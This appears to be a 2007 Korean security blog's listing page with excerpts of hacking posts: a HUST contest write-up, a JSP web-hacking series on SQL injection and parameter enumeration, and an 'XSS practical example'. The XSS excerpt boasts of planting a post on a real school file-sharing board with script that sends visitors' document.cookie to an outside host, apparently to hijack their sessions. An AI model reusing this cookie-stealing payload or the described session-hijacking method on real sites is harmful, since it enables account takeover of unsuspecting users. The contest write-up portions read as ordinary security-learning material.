Security128 제3회 HUST 해킹대회 보고서 안녕하세요? beist 입니다. 제 3 회 HUST 해킹 대회 보고서입니다. - Level1 통과 level1.exe 를 실행하면 플래쉬로 된 이상한 바이러스 화면 같은 것이 실행됩니다. 그리고 첨부된 port scanner 도 같이 실행이 되고, 몇가지 text 파일을 만듭니다. 아마도 이 것은 참가자의 눈속임을 위해서 만들어지는 것 같습니다. level1.exe 에 port scanner 가 실행되는 것을 보고, port scan 과 관련이 되어있는 줄 알았는데 대회 홈페이지에는 특별히 비정상적인 포트가 없는 것 같았습니다. 그리고, 로컬 PC 에 bind 하는 port 등이 없는 것으로 보아 level1.exe binary 를 분석하는 것이 문제의 의도일거라고 판단하였습니다. hex editor 로.. 2007. 3. 31. AHF 2005 보고서 2007. 3. 31. JSP 웹해킹 Web Hacking 1탄 SQL Injection Web Hacking 2탄 파일조작 Web Hacking 3탄 구멍난 자바스크립트 1. 시작하기 해커가 하나의 웹사이트를 공격하기 위해 많은 시간을 준비한다고 했습니다 그중에 가장 먼저 하는것 중에 하나가 바로 파라미터와 그 값에대한 목록 정리 입니다 즉 타겟 웹사이트의 모든 URL 파라미터를 GET, POST등으로 정리를 합니다 http://xxxxxxxx.com/pds/list1.php?cnum=2 http://xxxxxxxx.com/pds/list2.php?cnum=2&snum=21 http://xxxxxxxx.com/view.php?fnum=104591 http://xxxxxxxx.com/bbs/bbs.php?table=bbs_sw_qna htt.. 2007. 3. 31. JSP 기반의 Web hacking 방법 ┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓ ┃┃ ┃┃ ┃ ━┫ ━┫ ┃ ┃ ┃ ┃ ┃ ━╋┓ ┃ ┃ ┃ ┃ ┃ ┏━┫ ┃ ┃ ┃┃ ┃ ┃ ┣━ ┃ ━┫ ┃ ┣┓ ┏╋━ ┃┃ ┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃ ┃Since 2002. W / I / S / E / G / U / Y / S in HackerSchool ┃┃ ┃http://research.hackerschool.org wiseguys@hackerschool.org ┃┃ ┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ ━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━ :: Title :: jsp 기반의 w.. 2007. 3. 31. XSS - 실전사용예제 흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의 session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로, 적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다. MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해 우리는 신속하게 session_id를 사용할 수 있게 된다. 실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다. 제목 : 우와 진짜 끝내 주네요! 내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!! i.location="http://rvc.muz.ro/1.php?c="+document.cookie 스크립트가 들어갔지만 실제로 화면으론 다음과 같이.. 2007. 3. 31. Down it 2007. 3. 31. 이전 1 ··· 9 10 11 12 13 14 15 ··· 22 다음
